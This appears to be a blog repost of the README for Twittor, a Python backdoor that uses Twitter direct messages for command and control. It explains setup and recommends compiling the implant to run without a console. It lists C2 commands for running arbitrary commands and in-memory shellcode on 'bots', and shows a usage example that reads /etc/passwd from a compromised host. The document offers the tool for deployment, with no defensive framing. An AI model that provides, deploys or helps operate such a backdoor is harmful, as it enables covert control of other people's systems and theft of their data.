Twittor – Backdoor Using Twitter For Command & Control

Twittor is a stealthy Python based backdoor using Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat which does the same but using a Gmail account.

Setup

For this to work you need:

A Twitter account (Use a dedicated account! Do not use your personal one!)
Register an app on Twitter with Read, write, and direct messages Access levels.

Install the dependencies:

$ pip install -r requirements.txt

1	$ pip install –r requirements.txt

This repo contains two files:

twittor.py which is the client
implant.py the actual backdoor to deploy

In both files, edit the access token part and add the ones that you previously generated:

CONSUMER_TOKEN = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ CONSUMER_SECRET = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ ACCESS_TOKEN = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ ACCESS_TOKEN_SECRET = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’ USERNAME = ‘XXXXXXXXXXXXXXXXXXXXXXXX’

CONSUMER_TOKEN = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’

CONSUMER_SECRET = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’

ACCESS_TOKEN = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’

ACCESS_TOKEN_SECRET = ‘XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX’

USERNAME = ‘XXXXXXXXXXXXXXXXXXXXXXXX’

You’re probably going to want to compile implant.py into an executable using Pyinstaller. In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.

Usage

In order to run the client, launch the script.

$ python twittor.py

1	$ python twittor.py

You’ll then get into an ‘interactive’ shell which offers few commands that are:

$ help refresh – refresh C&C control list_bots – list active bots list_commands – list executed commands !retrieve <jobid> – retrieve jobid command !cmd <MAC ADDRESS> command – execute the command on the bot !shellcode <MAC ADDRESS> shellcode – load and execute shellcode in memory (Windows only) help – print this usage exit – exit the client $

$ help

refresh – refresh C&C control

list_bots – list active bots

list_commands – list executed commands

!retrieve <jobid> – retrieve jobid command

!cmd <MAC ADDRESS> command – execute the command on the bot

!shellcode <MAC ADDRESS> shellcode – load and execute shellcode in memory (Windows only)

help – print this usage

exit – exit the client

Once you’ve deployed the backdoor on a couple of systems, you can check available clients using the list command:

$ list_bots B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise $

$ list_bots

B7:76:1F:0B:50:B7: Linux–x.x.x–generic–x86_64–with–Ubuntu–14.04–precise

The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.

Let’s issue a command to an implant:

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd [+] Sent command “cat /etc/passwd” with jobid: UMW07r2 $

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd

[+] Sent command “cat /etc/passwd” with jobid: UMW07r2

Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd, the script then outputs the jobid that we can use to retrieve the output of that command.

You can download Twittor here:

Twittor-master.zip

Or read more here.

Dennis Nadeau Complaint Blog

Twittor – Backdoor Using Twitter For Command & Control

Setup

Usage

Leave a Reply